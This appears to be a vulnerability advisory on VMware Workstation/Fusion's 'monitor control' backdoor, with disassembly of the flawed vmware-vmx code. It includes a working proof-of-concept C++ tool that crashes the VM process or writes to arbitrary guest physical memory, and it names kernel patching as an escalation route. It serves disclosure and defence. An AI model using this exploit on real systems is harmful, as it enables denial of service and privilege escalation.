two security relevant vulnerabilities have been discovered affecting a
range of the VMWare virtualization product line.

- Denial of Service vulnerability allowing an unprivileged user to crash
- Vulnerability allowing an unprivileged user to escalate privileges
within the guest VM.

The vulnerabilities have initially been discovered in VMWare Workstation
6.5, have been confirmed to also affect the most recent versions of both
VMWare Workstation and VMWare Fusion and are believed to affect further
products.

*update*
the bugs have been silently fixed with VMWare Workstation 7.1 by
removing the monitor control backdoor code in vmware-vmx.


the vulnerabilities both are located within the "monitor control"
backdoor interface, which is not enabled by default. With a virtual
machine's monitor control backdoor interface enabled, a VM user could
cause the VM to either crash by causing it to access invalid memory or
writing to an arbitrary (virtualized) physical memory address, starting
at address 0x84 onwards and thus elevate privileges.

This is done by sending the backdoor data that is not validated by
vmware-vmx. In particular, the monitor control backdoor's sub-service
numbers 10 and 11 are affected, which both process physical addresses
that are passed to the backdoor by the user. The physical address is
then converted/mapped by vmware-vmx.exe to an address pointing to its
respective virtualized physical address and subsequently accessed
without validation.

The code snippet below shows the vulnerable code accessing potentially
invalid memory, leading to a Denial of Service condition (sub-service
11). The physical address passed to the monitor control backdoor by the
user is passed as an argument to
convert_host_phys_addr_to_virtual_mem_addr() at address 0x75AAF4 in
register eax. Upon return of the function, eax holds the converted
address in eax, which is copied to register esi and dereferenced at
address 0x75AAFF. If the user-supplied physical address is invalid, the
respective vmware-vmx process crashes.

.text:0075AAE7                                         ; DATA XREF:
.text:off_75AE18o
.text:0075AAE7                 lea     ecx, [ebp+a4]   ; jumptable
0075AA93 case 9
.text:0075AAEA                 push    ecx             ; a4
.text:0075AAEB                 push    3               ; a3
.text:0075AAED                 push    ebx
.text:0075AAEE                 push    188h            ; a2
.text:0075AAF3                 push    ebx
.text:0075AAF4                 push    eax             ; phys_addr
.text:0075AAF5                 mov     [ebp+a4], ebx
.text:0075AAF8                 call   
convert_host_phys_addr_to_virtual_mem_addr
.text:0075AAF8
.text:0075AAFD                 mov     esi, eax
.text:0075AAFF                 mov     eax, [esi+80h]  ; addr+0x80
.text:0075AB05                 add     esp, 18h
.text:0075AB08                 sub     eax, ebx
.text:0075AB0A                 jz      short case_0


The vulnerable code belonging to sub-service 10 of the backdoor is shown
below. Again, it takes a physical address provided by the user, converts
it, dereferences it at address 0x75AC68 and passes it to sub_75BD80().
This function has not been analyzed further but is believed to conduct
some kind of memory comparison. Its return code in eax subsequently is
stored to a user-controlled memory address at offset 0x84 (address
0x75AC78 in the disassembly), allowing the user to write to an arbitrary
physical memory address within the guest system. This can lead to
further compromise since it is possible to patch security-critical OS
code in memory, such as the SeAccessCheck() function exported by
ntoskrnl.exe on Windows virtual machines.

.text:0075AC08                 lea     ecx, [ebp+var_8] ; jumptable
0075AA93 case 8
.text:0075AC0B                 push    ecx             ; a4
.text:0075AC0C                 push    3               ; a3
.text:0075AC0E                 push    ebx
.text:0075AC0F                 push    88h ; '�'       ; a2
.text:0075AC14                 push    ebx
.text:0075AC15                 push    eax             ; phys_addr
.text:0075AC16                 mov     [ebp+var_8], ebx
.text:0075AC19                 call   
convert_host_phys_addr_to_virtual_mem_addr
.text:0075AC19
.text:0075AC1E                 mov     edx, dword_9A5E98
.text:0075AC24                 mov     esi, eax
.text:0075AC26                 mov     eax, [edx+210h]
.text:0075AC2C                 shr     eax, 2
.text:0075AC2F                 add     esp, 18h
.text:0075AC32                 test    al, 1
.text:0075AC34                 jz      short loc_75AC68
.text:0075AC34
...
.text:0075AC68 ;
---------------------------------------------------------------------------
.text:0075AC68
.text:0075AC68 loc_75AC68:                             ; CODE XREF:
monitorctl+1D4j
.text:0075AC68                 mov     edx, [esi+80h]
.text:0075AC6E                 push    esi
.text:0075AC6F                 push    edx
.text:0075AC70                 call    sub_75BD80
.text:0075AC70
.text:0075AC75                 add     esp, 8
.text:0075AC78                 mov     [esi+84h], eax  ; writes
0xFFFFFFFF to arbitrary address


Examples:
vmon 11 1111111111111111 <- crashes the vmware-vmx.exe process
vmon 10 <address> <- writes to arbitrary physical address starting at
physical address 0x84 onwards


vmon.cpp

/*
####################################################################
#                                                                  #
#                                                                  #
#    add the following line to your vmware vmx file to enable      #
#    "monitor control" backdoor:                                   #
#                                                                  #
#    isolation.monitor.control.disable = "FALSE"                   #
#                                                                  #
#                                                                  #
####################################################################
*/


#include "stdafx.h"
#include <stdio.h>
#include <stdlib.h>
#include <excpt.h>

int main(int argc, char* argv[])
{
	unsigned int subservice = 0;
	unsigned int value = 0;
	unsigned int result = 0;
	unsigned int code = 0;

	if(argc < 3)
		return printf("%s: <subservice no> <value>\nmissing argument.\n",argv[0]);

	subservice = atoi(argv[1]);
	value = atoi(argv[2]);

	__try
	{
		__asm
		{
			push eax
			push edx
			push ecx
			push ebx

			mov eax, 'VMXh'
			mov edx, 'VX'
			mov ecx, subservice
			shl ecx, 10h // upper 16 bit: subservice number for "monitor control" command
			or  ecx, 10h // lower 16 bit: backdoor service number for "monitor control" command (0x10)
			mov ebx, value // value to pass to "monitor control" subservice
			in  eax, dx

			mov result, eax
			mov code, ecx

			pop ebx
			pop ecx
			pop edx
			pop eax
		}
	}
	__except( EXCEPTION_EXECUTE_HANDLER)
	{
		printf("vmware backdoor not available.");
		return 0;
	}

	printf("result: %08X (eax), code: %08X (ecx)\n", result, code);

	return result;
}